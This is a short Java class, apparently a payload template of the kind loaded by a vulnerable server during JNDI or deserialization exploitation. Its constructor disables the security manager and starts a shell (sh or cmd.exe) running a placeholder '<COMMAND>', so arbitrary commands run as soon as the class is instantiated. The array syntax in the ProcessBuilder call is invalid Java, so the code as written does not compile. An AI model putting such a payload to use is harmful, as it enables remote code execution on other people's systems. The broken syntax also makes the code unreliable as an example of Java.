import java.io.File;
import java.io.IOException;

public class ExportObject {

	public ExportObject() {
	
		String executor = "/bin/sh";
		String param = "-c";
	    if (System.getProperty("os.name").toLowerCase().contains("win")) {
	    	executor = "cmd.exe";
	    	param = "/c";
	    }
	    
		try {
			System.setSecurityManager(null);
			new java.lang.ProcessBuilder({executor, param, "<COMMAND>"}).start();
		} catch(Exception e) {
			e.printStackTrace();
		}
	}
}